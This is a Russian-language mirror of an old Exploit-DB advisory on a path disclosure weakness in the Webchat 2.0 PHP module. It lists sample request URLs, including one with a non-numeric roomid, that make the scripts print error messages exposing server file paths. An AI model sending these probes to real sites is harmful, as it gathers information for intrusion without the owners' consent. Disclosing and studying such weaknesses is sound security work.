- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22704
- Проверка EDB
-
- Пройдено
- Автор
- RYNHO ZEROS WEB
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2003-06-02
Код:
source: https://www.securityfocus.com/bid/7774/info
Webchat has been reported prone to a path disclosure weakness.
Reportedly an attacker may make a malicious HTTP request for several Webchat PHP scripts to trigger the condition. Under some circumstances the request will trigger an exception, causing Webchat to display an error message, which may possibly contain sensitive path information.
This weakness was reported to affect Webchat version 2.0 other versions may also be affected.
http://www.example.com/modules/WebChat/out.php
http://www.example.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
http://www.example.com/modules/WebChat/in.php
http://www.example.com/modules/WebChat/quit.php
http://www.example.com/modules/WebChat/users.php- Источник
- www.exploit-db.com
